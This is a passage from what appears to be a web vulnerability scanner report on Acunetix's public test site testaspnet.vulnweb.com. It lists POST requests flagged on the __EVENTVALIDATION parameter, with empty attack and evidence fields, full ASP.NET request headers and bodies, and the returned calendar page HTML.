style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8357&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAADdb3yNoIZGRkVDVCN9%2BbYSEvLXTuJsLbPwDX%2Bn8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKD6tKjCQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA9YE2io8AM1aADzhVsHdMHbph0oR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:04 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAADdb3yNoIZGRkVDVCN9+bYSEvLXTuJsLbPwDX+n8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKD6tKjCQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA9YE2io8AM1aADzhVsHdMHbph0oR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:White" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8309&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgAAOeI%2Fo9oIZGRkJa%2F%2FP4axwdj9BWTmdkKt1Lw%2FPpo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKdhfLnCwLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gJNw2jYgDTpRk8YbaRDBoWeqgkq2Q%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:58 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgAAOeI/o9oIZGRkJa//P4axwdj9BWTmdkKt1Lw/Ppo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKdhfLnCwLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gJNw2jYgDTpRk8YbaRDBoWeqgkq2Q==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:White" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p 